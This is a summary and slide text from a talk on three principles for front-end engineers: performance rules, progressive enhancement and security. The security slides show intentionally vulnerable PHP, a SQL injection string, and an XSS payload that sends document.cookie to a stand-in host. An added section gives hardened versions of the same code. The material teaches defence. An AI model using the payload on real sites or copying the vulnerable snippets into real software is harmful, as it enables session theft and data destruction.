This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
19. 14 Performance Best Practices
- Make fewer HTTP requests
- Use a CDN
- Add an Expires header
- Gzip components
- Put CSS at the top
- Move JS to the bottom
- Avoid CSS expressions
- Make JS and CSS external
- Reduce DNS lookups
- Minify JS
- Avoid redirects
- Remove duplicate scripts
- Turn off ETags
- Make AJAX cacheable and small
20. More …
- Minimize DOM Operations
- Develop Smart Event Handlers
- Preload Components
- … http://developer.yahoo.com/performance/rules.html
33. What's wrong with this Code?
<?php
…
$sql = "DELETE FROM users WHERE name = '" . $_POST['username'] . "'";
$result = mysql_query($sql);
?>
34. SQL Injection Attack
<?php
…
$sql = "DELETE FROM users WHERE name = '" . $_POST['username'] . "'";
$result = mysql_query($sql);
?>
What if $_POST['username'] is "x' OR '1'='1" ?
35. What's wrong with this Code?
<div> You are referred from <?php echo $_GET['from']; ?> </div>
36. XSS Attack
<div> You are referred from <?php echo $_GET['from']; ?> </div>
What if the URL is "http://www.yahoo.com/?from=</div><script>document.location='http://www.eval.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>" ?
37. Your Cookie is Stolen
<div> You are referred from </div><script>document.location='http://www.eval.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> </div>
38. What's wrong with this Code?
<?php
if (user_is_login()) {
    delete_something();
}
?>
39. CSRF Attack
<?php
if (user_is_login()) {
    delete_something();
}
?>
The request might not be the user's intention
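An added example (not from Morgan Cheng's slides) showing the hardened form of the three snippets on slides 33 to 39: a prepared statement for the delete, output encoding for the referrer echo, and a per-session CSRF token that must accompany the delete request. It assumes a mysqli connection in $db and the slides' own user_is_login() function already exist.

```php
<?php
// Added example, not from the original slides: hardened forms of the three
// vulnerable snippets. Assumes a mysqli connection in $db, an existing
// user_is_login() function (from the slides), and an active session.
session_start();
// SQL injection: bind $_POST['username'] as a parameter instead of splicing it
// into the query, so "x' OR '1'='1" is compared literally against the name column.
function delete_user(mysqli $db, string $username): int
{
    $stmt = $db->prepare('DELETE FROM users WHERE name = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    return $stmt->affected_rows;
}
// XSS: encode untrusted text before it lands in HTML, so "</div><script>"
// is displayed as text instead of being parsed as markup.
function safe_html(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
// CSRF: a logged-in session is not consent. Store a random per-session token,
// embed it in the form, and require it back on every state-changing request.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
function csrf_valid(array $post): bool
{
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}
// State changes only on POST, only when logged in, only with a valid token.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!user_is_login() || !csrf_valid($_POST)) {
        http_response_code(403);
        exit('Forbidden');
    }
    delete_user($db, (string) ($_POST['username'] ?? ''));
}
?>
<div>You are referred from <?= safe_html($_GET['from'] ?? '') ?></div>
<form method="post">
  <input type="hidden" name="csrf_token" value="<?= safe_html(csrf_token()) ?>">
  <input type="text" name="username"> <button type="submit">Delete</button>
</form>
```

The token check uses hash_equals so the comparison does not leak timing information, and the delete is refused on a plain GET, which is what a cross-site image tag or link would send.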